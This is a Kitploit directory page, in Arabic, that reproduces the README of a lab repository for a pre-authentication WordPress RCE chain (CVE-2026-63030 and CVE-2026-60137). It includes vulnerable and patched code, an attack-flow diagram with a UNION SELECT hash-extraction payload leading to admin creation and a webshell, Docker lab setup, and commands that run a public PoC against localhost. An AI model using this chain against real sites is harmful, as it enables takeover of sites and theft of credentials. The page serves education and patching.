Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2026-63030-lab — wp2shell (CVE-2026-63030 & CVE-2026-60137) - سلسلة RCE كاملة | Kitploit
أدوات/GitHubGitHub/mhassani97/cve-2026-63030-lab
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويبالتعلم والتعليممختبرات وتدريب عملي
GitHubmhassani97/cve-2026-63030-lab

cve-2026-63030-lab

wp2shell (CVE-2026-63030 & CVE-2026-60137) - سلسلة RCE كاملة

عرض المستودع
1منذ 4 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-63030 — wp2shell Lab

RCE قبل المصادقة في نواة ووردبريس عبر خلط مسارات الدفعات في REST API + حقن SQL

WordPress CVE CVSS License

نظرة عامة

تنزيل الأداة

wp2shell هي سلسلة من ثغرتين منخفضتي الخطورة بشكل مستقل في نواة ووردبريس، وعند دمجهما تسمحان لمهاجم عن بُعد غير مصادَق بـ:

  1. الوصول إلى نقطة حقن SQL دون أي بيانات اعتماد
  2. استخراج تجزئة كلمة مرور المدير من قاعدة البيانات
  3. إنشاء حساب مدير جديد
  4. رفع ويب شيل وتحقيق تنفيذ كامل للأكواد عن بُعد (RCE)
الخاصيةالتفاصيل
CVEsCVE-2026-63030 + CVE-2026-60137
CVSS9.8 حرجة
المصادقة المطلوبةلا شيء (قبل المصادقة)
متجه الهجومالشبكة
الإصدارات المتأثرةووردبريس 6.9.0–6.9.4 و7.0.0–7.0.1
الإصدارات المُصحَّحة6.9.5 و7.0.2 (صدرت في 17 يوليو 2026)

الثغرتان

CVE-2026-63030 — خلط مسارات الدفعات في REST API

الملف: wp-includes/rest-api/class-wp-rest-server.php

تحتفظ الدالة serve_batch_request_v1() بمصفوفتين متوازيتين: $matches[] للمعالجات و$validation[] للنتائج. عندما يفشل طلب فرعي برسالة WP_Error (مسار مكسور)، يُدفع إلى $validation[] ولكن ليس إلى $matches[]. يؤدي هذا إلى إزاحة مؤشر بمقدار +1 — إذ يُوجَّه الطلب الفرعي i إلى المعالج المخصص للطلب الفرعي i+1.

root@kitploit:~
// VULNERABLE (7.0.1)
if ( is_wp_error( $route ) ) {
    $responses[] = envelope();
    continue; // $matches[] NOT pushed ← BUG
}

// PATCHED (7.0.2)
if ( is_wp_error( $route ) ) {
    $matches[]   = null; // ← FIX: keeps arrays in sync
    $responses[] = envelope();
    continue;
}

CVE-2026-60137 — حقن SQL في WP_Query

الملف: wp-includes/class-wp-query.php

تتوقع المعاملة author__not_in مصفوفة من الأعداد الصحيحة. عند تمرير سلسلة نصية، تدمج الدالة implode() القيمة الخام مباشرة في جملة SQL WHERE — دون تهريب ودون استخدام معاملات.

root@kitploit:~
// VULNERABLE (7.0.1)
$where .= ' NOT IN (' . implode(',', $q['author__not_in']) . ')';

// PATCHED (7.0.2)
$safe   = implode(',', array_map('absint', (array) $q['author__not_in']));
$where .= " NOT IN ($safe)";

سلسلة الهجوم

root@kitploit:~
Unauthenticated Attacker
        │
        ▼
POST /?rest_route=/batch/v1          ← Outer batch
  sub-req 0: "///"   → WP_Error → index shift (+1)
  sub-req 1: POST /wp/v2/posts       ← dispatched under BATCH handler
  sub-req 2: POST /batch/v1          ← dummy
        │
        │  [Confusion #1 active]
        ▼
Inner batch (body of sub-req 1)      ← schema never validated
  inner 0: "///"    → index shift (+1)
  inner 1: GET /wp/v2/posts?author_exclude=<PAYLOAD>
           dispatched under posts get_items()
        │
        │  [Confusion #2 active]
        ▼
WP_Query: author__not_in = raw string
        │
        ▼
SQL: NOT IN (0) UNION SELECT 999999,...,HEX(user_pass),...
        │
        ▼
title.rendered = "||1|admin|$wp$2y$10$...<hash>...||"
        │
        ▼
Crack hash  OR  crack-free oEmbed technique
        │
        ▼
POST /wp/v2/users → new admin → plugin upload → webshell → RCE

إعداد المختبر

المتطلبات الأساسية

الأداةالتنزيل
Docker Desktop (Windows / macOS)https://www.docker.com/products/docker-desktop
Docker Engine (Linux)https://docs.docker.com/engine/install
Githttps://git-scm.com/downloads
Burp Suite Community (اختياري)https://portswigger.net/burp/communitydownload

الخطوة 1 — استنساخ المستودع

root@kitploit:~
git clone https://github.com/YOUR_USERNAME/cve-2026-63030-lab
cd cve-2026-63030-lab

سترى هذه الملفات:

root@kitploit:~
cve-2026-63030-lab/
├── docker-compose.yml     ← defines WordPress + MySQL containers
├── Dockerfile             ← custom image with Apache fix + wp-cli
├── init.sh                ← configures permalink after install
└── fix-htaccess.ps1       ← Windows helper (run if Apache returns 404)

الخطوة 2 — بناء المختبر وتشغيله

root@kitploit:~
docker compose up -d --build

سيقوم هذا بما يلي:

  • بناء صورة ووردبريس 7.0.1 المخصصة (يستغرق ~1–2 دقيقة عند أول تشغيل)
  • تشغيل حاوية قاعدة بيانات MySQL 8.0
  • عرض ووردبريس على http://localhost:9090

تأكد من أن الحاويتين تعملان:

root@kitploit:~
docker compose ps

المخرجات المتوقعة:

root@kitploit:~
NAME              STATUS
wp2shell-lab      running
wp2shell-db       running

الخطوة 3 — إكمال تثبيت ووردبريس

افتح http://localhost:9090 في متصفحك واملأ الحقول التالية:

الحقلالقيمة المقترحة
عنوان الموقعCVE-2026-63030
اسم المستخدمadmin
كلمة المرورأي كلمة مرور
البريد الإلكتروني[email protected]

انقر تثبيت ووردبريس، ثم سجّل الدخول.


الخطوة 4 — تفعيل توجيه REST API (مطلوب)

نفّذ هذا مرة واحدة بعد التثبيت:

Linux / macOS:

root@kitploit:~
docker exec wp2shell-lab bash -c "
  wp rewrite structure '/%postname%/' --allow-root --path=/var/www/html &&
  wp rewrite flush --allow-root --path=/var/www/html
"

Windows PowerShell:

root@kitploit:~
docker exec wp2shell-lab bash -c "wp rewrite structure '/%postname%/' --allow-root --path=/var/www/html && wp rewrite flush --allow-root --path=/var/www/html"

المخرجات المتوقعة:

root@kitploit:~
Success: Rewrite structure set.
Success: Rewrite rules flushed.

الخطوة 5 — إصلاح .htaccess (لنظام Windows فقط، إذا حصلت على خطأ 404 من REST API)

root@kitploit:~
.\fix-htaccess.ps1

الخطوة 6 — التحقق من أن المختبر جاهز

root@kitploit:~
curl -s http://localhost:9090/wp-json/ | python3 -m json.tool | head -5

إذا رأيت استجابة JSON تحتوي على "namespaces" — فالمختبر جاهز.


تفكيك المختبر

root@kitploit:~
# Stop and remove everything including database
docker compose down -v

الاستغلال (إثبات المفهوم PoC)

⚠️ لأغراض البحث الأمني المصرَّح به والتعليم فقط. لا تستخدمه إلا ضد أنظمة تملكها أو لديك إذن كتابي صريح لاختبارها.

سلسلة الاستغلال الكاملة (الكشف ← SQLi ← إنشاء مدير ← ويب شيل ← RCE) منفّذة في:

github.com/Icex0/wp2shell-poc

root@kitploit:~
git clone https://github.com/Icex0/wp2shell-poc
cd wp2shell-poc
pip install -r requirements.txt

# Step 1: Detection only (non-destructive)
python wp2shell.py check http://localhost:9090

# Step 2: Read database — extract users and hashes
python wp2shell.py read --preset users http://localhost:9090

التصحيح

ثلاثة ملفات، أقل من 10 أسطر من PHP:

الملفالتغيير
class-wp-rest-server.php$matches[] = null كعنصر نائب لإبقاء المصفوفتين متزامنتين
class-wp-query.phpتحويل (array) + array_map('absint', ...)
class-wp-rest-posts-controller.phpنفس التعقيم في طبقة REST

حدّث إلى ووردبريس 6.9.5 أو 7.0.2 لمعالجة الثغرات.


المراجع

الموردالرابط
استشارة GitHub (CVE-2026-63030)GHSA-ff9f-jf42-662q
استشارة GitHub (CVE-2026-60137)GHSA-fpp7-x2x2-2mjf
إثبات المفهوم العام (PoC)https://github.com/Icex0/wp2shell-poc

صُنع بـ ❤️ بواسطة Black Security Team

Website Telegram LinkedIn

هذا المستودع لأغراض تعليمية وللبحث الأمني المصرَّح به فقط. لا تختبر أنظمة لا تملكها أو ليس لديك إذن كتابي صريح لاختبارها.